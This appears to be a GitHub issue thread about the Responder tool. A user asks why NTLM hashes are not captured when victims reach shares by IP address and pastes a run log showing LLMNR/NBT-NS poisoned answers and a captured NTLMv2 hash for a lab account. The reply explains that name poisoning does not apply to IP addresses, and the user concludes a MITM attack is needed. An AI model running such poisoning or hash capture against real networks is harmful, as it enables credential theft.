Not work when victime use the ip address to access to the shared folders
MiMaz7707 opened this issue · 3 comments
Hello,
it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.
`responder -I eth0 -dwv
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -| --| _ | _ | | _ || -| _|
|| ||| ||||||||
|_|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth0]
Responder IP [192.168.117.200]
Responder IPv6 [fe80::9024:b852:9137:c6f]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-OE0U3JW4FXX]
Responder Domain Name [WYT3.LOCAL]
Responder DCE-RPC Port [46345]
[+] Listening for events...
[] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server)
[] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S
[*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S
[SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d
[SMB] NTLMv2-SSP Username : MYLAB\test
[SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `
LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.
Hello,
i get it, so it need to do a MiTM attack to get response from victimes that use ip address.
Thanks.